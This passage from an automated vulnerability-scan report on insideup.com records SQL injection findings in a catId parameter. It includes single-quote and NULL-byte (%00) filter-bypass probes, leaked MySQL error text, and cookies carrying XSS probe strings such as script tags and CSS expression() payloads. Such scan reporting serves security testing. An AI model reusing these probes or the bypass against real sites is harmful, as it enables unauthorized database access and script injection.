Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:37:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=gq3rfa4k1544a0ki0ajn758jf4; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/hins00/project_dynamic_page_updated.php'?catId=50002&group=hins00&template=3' OR prj.project_page_url = 'leadflow/hins00/project_dynamic_page_updated.php'?catId=50002&group=hins00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&group=hins00&template=3' OR prj.project_page_url = 'leadflow/hins00' at line 5

Request 2

GET /ppc/leadflow/hins00/project_dynamic_page_updated.php''?catId=50002&group=hins00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:37:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=7amn5ld5hb9t88h8u4bshrnih7; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/hins00/project_dynamic_page_updated.php'' was not found on this server.</p>

1.389. http://www.insideup.com/ppc/leadflow/hins00/project_dynamic_page_updated.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project_dynamic_page_updated.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

POST /ppc/leadflow/hins00/project_dynamic_page_updated.php?catId=50002%00'&group=hins00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 598

subcategoryId=50002&catId=50002&iusrc=iupsc+&attributeId_556_t=&attributeId_555_t=&attributeId_514_t=&attributeId_421=2740__Yes&attributeId_515=3355__Not+sure&attributeId_422[]=2747__Other+or+not+sure
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:29:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=0scj77qrsfm4qe2pa4sj5jn031; path=/
Content-Length: 2494
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
adflow/hins00/project_dynamic_page_updated.php?catId=50002.'&group=hins00&template=3' OR prj.project_page_url = 'leadflow/hins00/project_dynamic_page_updated.php?catId=50002.'&group=hins00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group=hins00&template=3' OR prj.project_page_url = 'leadflow/hins00/project_dyna' at line 5

Request 2

POST /ppc/leadflow/hins00/project_dynamic_page_updated.php?catId=50002%00''&group=hins00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 598

subcategoryId=50002&catId=50002&iusrc=iupsc+&attributeId_556_t=&attributeId_555_t=&attributeId_514_t=&attributeId_421=2740__Yes&attributeId_515=3355__Not+sure&attributeId_422[]=2747__Other+or+not+sure
...[SNIP]...

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:29:53 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=81qmls6d58f4b1qn57m1jf6cj3; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/hins00/project_dynamic_page_updated.php was not found on this server.</p>

1.390. http://www.insideup.com/ppc/leadflow/hins00/project_dynamic_page_updated.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project_dynamic_page_updated.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project_dynamic_page_updated.php?catId=50002'&group=hins00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; 